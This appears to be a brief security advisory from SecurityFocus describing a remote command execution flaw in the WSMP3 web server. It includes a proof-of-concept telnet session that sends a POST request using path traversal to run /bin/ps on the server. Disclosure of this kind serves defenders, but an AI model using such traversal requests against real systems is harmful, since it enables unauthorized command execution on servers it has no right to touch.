WSMP3 Remote Command Execution Vulnerability

No exploit is required. However the following proof of concept POST request has been provided:

bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0


 

Privacy Statement
Copyright 2010, SecurityFocus